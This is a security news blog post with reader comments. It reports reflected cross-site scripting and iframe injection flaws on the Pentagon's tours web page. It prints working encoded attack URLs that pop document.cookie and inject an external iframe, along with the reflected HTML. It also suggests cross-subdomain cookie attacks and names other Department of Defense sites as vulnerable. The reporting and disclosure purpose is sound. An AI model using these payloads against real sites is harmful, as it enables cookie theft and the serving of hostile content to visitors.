Pentagon Web Site Vulnerabilities Identified

pentagon-logo

A Romanian hacker has on December 6th re-identified previously discovered input validation deficiencies in URL parameter handling leading to security vulnerabilities on a tour images section of the official web site of the Pentagon, the headquarters of the U.S. Department of Defense. The hacker who identifies himself as Ne0h has posted images demonstrating the vulnerabilities, which are still active at the time of this blog post, on his blog.

The vulnerabilities themselves are caused by weak validation of name value pairs being received by the browser in a photo album application on the Pentagon web site. The normal page, seen here, loads pictures of past tours of the Pentagon. The entire web site is largely on online brochure for the Pentagon, and does not appear to host sensitive data or allow users to make sensitive requests, making the risk profile of the site low. Ne0h actually rediscovered vulnerabilities first identified back in April by XaDoS and posted on the XSSed project.

Cross Site Scripting

The attack string that follows shows the inclusion of a Javascript that will reflect back once the tours page is returned to the browser. The special characters in the script are URL encoded. The script calls the alert function, which will pop up a window. The inclusion of document.cookie will cause all cookies the user has set for that web site to show up in the alert box. This attack is an example of a non-persistent or a reflected cross site scripting vulnerability.

XSS String

http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title=1%3E%22%3E%3CScRiPt%20%0A
%0D%3Ealert%28document.cookie%29%3B%3C/ScRiPt%3E

XSS String, XaDos example:

http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title=group-SgtMaj.jpg%22%3E%3E!-^^%3E%3Csc
ript%3Ealert(%27XaDoS%27)%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS document.cookie request

XSS document.cookie request


The code is reflected back in the returned HTML:

     
    <div id="content_1column">
        <div id="content_main">
            <h2>Tours</h2>
            <h3>Photo Gallery</h3>
                <div id="galleryPhotoLg">

                    <img src="images/largePhotos/1>"><ScRiPt 

>alert(document.cookie);</ScRiPt>" width="650" height="480" alt="Image Gallery"  />
               </div> 

The Pentagon web site is showing a JSESSIONID, a cookie format used in Java web applications, however the site does not appear to maintain user session, so it is likely a tracking cookie or unused. If cookie theft (of a valuable cookie) is out though, there are still problems including site redirect and related Javascript based manipulations possible with this vulnerability. An example for further exploration would be attempting some manner of cross subdomain cookie attack as the afis.osd.mil (AFIS is the American Forces Information Service) hosts a number of Department of Defense web properties, some of which may maintain user session or host more sensitive data than the brochureware type site the Pentagon is hosting.

iFrame Injection

The second proof of concept demonstrates an iFrame inclusion vulnerability. An iFrame is an element in an HTML page that is loaded and refreshed as a separate page, but loads under the original page. In this example, an attacker can load content from outside the Pentagon web site, but serve it to the user as part of the Pentagon web site (malicious software and so forth) in a provided URL.

iFrame Inclusion String

http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title=1%22%3E%3Ciframe%20src=

http://ne0h.baywords.com%3E%3C/iframe%3E

iFrame loads another web site (Ne0h's blog in this case).

iFrame loads another web site (Ne0h's blog in this case).


Ne0h

Global Hell - We are your armageddon.

Global Hell - We are your armageddon.

It is an interesting handle for a hacker or cracker, as its already taken by a Canadian hacker who was a member of gLobalHell, a group responsible for a number of well known defacements and break ins including the systems of the White House, U.S. Army, and the U.S. Postal Service. I guess we could call his handle an homage.

This Ne0h has demonstrated vulnerabilities of other web sites successfully including a SQL injection on two MTV properties called MTV Philippines and MTV India using the Pangolin SQL injection testing tool and XSS (cross site scripting) vulnerabilities on TinaTurnerlive.com and Logitech.com. He has also demonstrated successfully vulnerabilities in the web site of the Romanian police.

Baywords, The Choice of Romanian Hackers?

We are noticing now a couple of these folks using Baywords, a blogging platform known for this raison d’etre:

Over a year ago, a friend of ours got his blog closed by WordPress for violation of TOS. Essentially he got blocked because he linked to material that could lead to maybe a download of something that you might not have paid for. We became very upset and decided to open Baywords!

The authors whose blogs we’re linking to like Baywords for this reason:

Baywords is now back again, and we’re not taking any details on the users. As long as it’s legal to write, we won’t close down your blog. We will not give out any information, IPs or anything else — that data is deleted when no longer needed.

No condemnation, we’ve just noticed Baywords showing up more often in these situations. If it is not on BayWords however, it would just be somewhere else.

Finally

At the time of writing, these vulnerabilities are still active, which makes this nearly nine months of being open (credit Mike Bailey for pointing this out). If not patched, the Pentagon web site may be used as part of other web based attacks via redirection using URL’s sent to a user that appear to be for the Pentagon web site. This type of XSS vulnerability, a reflected XSS vulnerability, is fairly common in web applications and does not have as large an impact as other input validation problems. A high profile site such as that of the Pentagon should close it out though. The Pentagon and other DOD entities have a reputation interest in appearing to be highly competent in securing their infrastructure. If there was no other reason to search out and correct common low hanging fruit web site vulnerabilities (there are of course), this would be enough of a reason.

Update 1:

This exact vulnerability continues to be pointed out, this time in October. The earliest reference we identified is still in April from the XSS’d Project.


Update 2:

Mike Bailey, a security researcher with web application expertise, and I have been having a friendly give and take on Twitter about whether this example is newsworthy by itself, following that whether it is depressing that XSS flaws are no longer newsworthy, whether this serves as a great example to get reasoned attention on the issue with its downstream problems and so on.

In the midst of proving his points, the DOD has gotten some good analysis of their web sites XSS vulnerabilities, as Mike tested a number of the other properties under afis.osd.mil as part of his blog post. So while the first problem is being fixed, here are a few others to go after:

Department of Defense's imagery website.

Department of Defense's imagery website, XSS vulnerability.

Joint combat camera center web site, XSS vulnerability.

Joint combat camera center web site, XSS vulnerability.

American Forces Network, XSS vulnerability.

American Forces Network, XSS vulnerability.

References

Filed Under: Cross Site Scriptingfeatured

Tags: , , , ,

Comments (9)

Trackback URL | Comments RSS Feed

  1. [...] XSS-ed. Praetorian Prefect | Pentagon Web Site Vulnerabilities Identified __________________ "Social engineering bypasses all technologies, including [...]

  2. mda says:

    “A Romanian hacker” Cand am vazut asta mi-a pierit cheful de citit.Sa fim seriosi. Pa

  3. Prefect says:

    MDA – I could see that. I didn’t want to say cracker, because there did not appear to be any malicious intent.

    Researcher did not appear appropriate either.

    So I settled on hacker – he who may enjoy the challenge of breaking into other computers but does no harm;

  4. [...] addressed immediately; even if you are confident about not browsing malicious sites, a known site, such as the Pentagon web site, could be used to automatically execute or redirect you to malicious code using cross-site [...]

  5. [...] to an external JavaScript, I can do most anything I can do in JavaScript,” says Kennedy, who blogged about the find yesterday. “That includes basic stuff, like crafting a URL to send to users [...]

  6. MaXe says:

    There’s more XSS vulnerabilities on the DoD domain.. (They’re already been notified)

  7. [...] Pentagon Web Site Vulnerabilities Identified – praetorianprefect.com A Romanian hacker has discovered security vulnerabilities on a tour images section of the official web site of the Pentagon. [...]

  8. [...] Pentagon Web Site Vulnerabilities Identified [...]